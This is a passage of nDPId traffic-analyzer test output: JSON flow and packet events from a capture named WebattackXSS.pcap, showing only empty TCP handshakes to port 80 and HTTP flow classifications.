-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4580,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":323,"flow_packet_id":2,"flow_last_seen":1499347517171,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347517171,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4rJwyiE5Cdc9faAScSDL4wAAAgQFtAQCCAoD5NH+ATsAiAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4581,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":323,"flow_packet_id":3,"flow_last_seen":1499347517172,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347517172,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0PfVAAD4Gh+OsEAABwKgKMuKyAFAJ1z19cMohOoAQAOVq6gAAAQEICgE7AIkD5NH+"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4591,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":324,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347518410,"flow_last_seen":1499347518410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347518410,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58048,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4591,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":324,"flow_packet_id":1,"flow_last_seen":1499347518410,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347518410,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8FGZAAD4GsWqsEAABwKgKMuLAAFAhaxXYAAAAAKACchBBtwAAAgQFtAQCCAoBOwG+AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4592,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":324,"flow_packet_id":2,"flow_last_seen":1499347518410,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347518410,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4sCWVenKIWsV2aAScSDrXAAAAgQFtAQCCAoD5NM0ATsBvgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4593,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":324,"flow_packet_id":3,"flow_last_seen":1499347518410,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347518410,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0FGdAAD4GsXGsEAABwKgKMuLAAFAhaxXZllXpy4AQAOWKZAAAAQEICgE7Ab4D5NM0"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4603,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":325,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347519679,"flow_last_seen":1499347519679,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347519679,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58062,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4603,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":325,"flow_packet_id":1,"flow_last_seen":1499347519679,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347519679,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8A+RAAD4GweysEAABwKgKMuLOAFBZkgEfAAAAAKACchAc\/gAAAgQFtAQCCAoBOwL7AAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4604,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":325,"flow_packet_id":2,"flow_last_seen":1499347519679,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347519679,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4s4k\/bw4WZIBIKAScSBkUQAAAgQFtAQCCAoD5NRxATsC+wEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4605,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":325,"flow_packet_id":3,"flow_last_seen":1499347519680,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347519680,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0A+VAAD4GwfOsEAABwKgKMuLOAFBZkgEgJP28OYAQAOUDWAAAAQEICgE7AvwD5NRx"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4621,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":326,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347522204,"flow_last_seen":1499347522204,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347522204,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58088,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4621,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":326,"flow_packet_id":1,"flow_last_seen":1499347522204,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347522204,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8G91AAD4GqfOsEAABwKgKMuLoAFAaMR6uAAAAAKACchA8PgAAAgQFtAQCCAoBOwVzAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4622,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":326,"flow_packet_id":2,"flow_last_seen":1499347522204,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347522204,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4uhHWnn+GjEer6AScSCg9wAAAgQFtAQCCAoD5NboATsFcwEDAwc="} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4623,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":326,"flow_packet_id":3,"flow_last_seen":1499347522205,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347522205,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0G95AAD4GqfqsEAABwKgKMuLoAFAaMR6vR1p5\/4AQAOU\/\/wAAAQEICgE7BXMD5Nbo"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4633,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":327,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347523488,"flow_last_seen":1499347523488,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347523488,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58102,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4633,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":327,"flow_packet_id":1,"flow_last_seen":1499347523488,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347523488,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8bP1AAD4GWNOsEAABwKgKMuL2AFCTdmpJAAAAAKACchB2DgAAAgQFtAQCCAoBOwa0AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4634,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":327,"flow_packet_id":2,"flow_last_seen":1499347523488,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347523488,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4vYacquOk3ZqSqAScSDU3gAAAgQFtAQCCAoD5NgpATsGtAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4635,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":327,"flow_packet_id":3,"flow_last_seen":1499347523489,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347523489,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0bP5AAD4GWNqsEAABwKgKMuL2AFCTdmpKGnKrj4AQAOVz5gAAAQEICgE7BrQD5Ngp"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4648,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":328,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347524782,"flow_last_seen":1499347524782,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347524782,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58116,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4648,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":328,"flow_packet_id":1,"flow_last_seen":1499347524782,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347524782,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8uUBAAD4GDJCsEAABwKgKMuMEAFAFWr63AAAAAKACchCuawAAAgQFtAQCCAoBOwf3AAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4649,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":328,"flow_packet_id":2,"flow_last_seen":1499347524782,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347524782,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4wR+L\/VQBVq+uKAScSBeeAAAAgQFtAQCCAoD5NltATsH9wEDAwc="} 
-00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4650,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":328,"flow_packet_id":3,"flow_last_seen":1499347524783,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347524783,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0uUFAAD4GDJesEAABwKgKMuMEAFAFWr64fi\/1UYAQAOX9fwAAAQEICgE7B\/cD5Nlt"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4657,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":329,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347526155,"flow_last_seen":1499347526155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347526155,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58130,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4657,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":329,"flow_packet_id":1,"flow_last_seen":1499347526155,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347526155,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8vM5AAD4GCQKsEAABwKgKMuMSAFBd27WBAAAAAKACchBdugAAAgQFtAQCCAoBOwlPAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4658,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":329,"flow_packet_id":2,"flow_last_seen":1499347526155,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347526155,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4xLVlk4tXdu1gqAScSBcLAAAAgQFtAQCCAoD5NrEATsJTwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4659,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":329,"flow_packet_id":3,"flow_last_seen":1499347526156,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347526156,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0vM9AAD4GCQmsEAABwKgKMuMSAFBd27WC1ZZOLoAQAOX7MwAAAQEICgE7CU8D5NrE"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4663,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347395736,"flow_last_seen":1499347401725,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347526161,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56738,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4663,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347395736,"flow_last_seen":1499347401725,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347526161,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56738,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4663,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347398258,"flow_last_seen":1499347403725,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347526161,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56764,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4663,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347398258,"flow_last_seen":1499347403725,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347526161,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56764,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4663,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347399514,"flow_last_seen":1499347404726,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347526161,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56778,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4663,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347399514,"flow_last_seen":1499347404726,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347526161,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56778,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4663,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347400752,"flow_last_seen":1499347406726,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347526161,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56792,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4663,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347400752,"flow_last_seen":1499347406726,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347526161,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56792,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4663,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347403327,"flow_last_seen":1499347408726,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347526161,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56818,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4663,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347403327,"flow_last_seen":1499347408726,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347526161,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56818,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4663,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347404575,"flow_last_seen":1499347409726,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347526161,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56832,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4663,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347404575,"flow_last_seen":1499347409726,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347526161,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56832,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4666,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":330,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347527425,"flow_last_seen":1499347527425,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347527425,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58144,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4666,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":330,"flow_packet_id":1,"flow_last_seen":1499347527425,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347527425,"pkt":"ABm5CmnxAMGxFOsxCABFAAA84vtAAD4G4tSsEAABwKgKMuMgAFAAyeh3AAAAAKACchCGiwAAAgQFtAQCCAoBOwqMAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4667,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":330,"flow_packet_id":2,"flow_last_seen":1499347527425,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347527425,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4yBtIXfPAMnoeKAScSDCkwAAAgQFtAQCCAoD5NwBATsKjAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4668,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":330,"flow_packet_id":3,"flow_last_seen":1499347527426,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347527426,"pkt":"ABm5CmnxAMGxFOsxCABFAAA04vxAAD4G4tusEAABwKgKMuMgAFAAyeh4bSF30IAQAOVhmwAAAQEICgE7CowD5NwB"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4678,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":331,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347528679,"flow_last_seen":1499347528679,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347528679,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58158,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4678,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":331,"flow_packet_id":1,"flow_last_seen":1499347528679,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347528679,"pkt":"ABm5CmnxAMGxFOsxCABFAAA86w9AAD4G2sCsEAABwKgKMuMuAFDPaODJAAAAAKACchC+UQAAAgQFtAQCCAoBOwvGAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4679,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":331,"flow_packet_id":2,"flow_last_seen":1499347528679,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347528679,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4y4jZsPUz2jgyqAScSD21QAAAgQFtAQCCAoD5N07ATsLxgEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4680,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":331,"flow_packet_id":3,"flow_last_seen":1499347528680,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347528680,"pkt":"ABm5CmnxAMGxFOsxCABFAAA06xBAAD4G2sesEAABwKgKMuMuAFDPaODKI2bD1YAQAOWV3QAAAQEICgE7C8YD5N07"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4701,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":332,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347531303,"flow_last_seen":1499347531303,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347531303,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58184,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 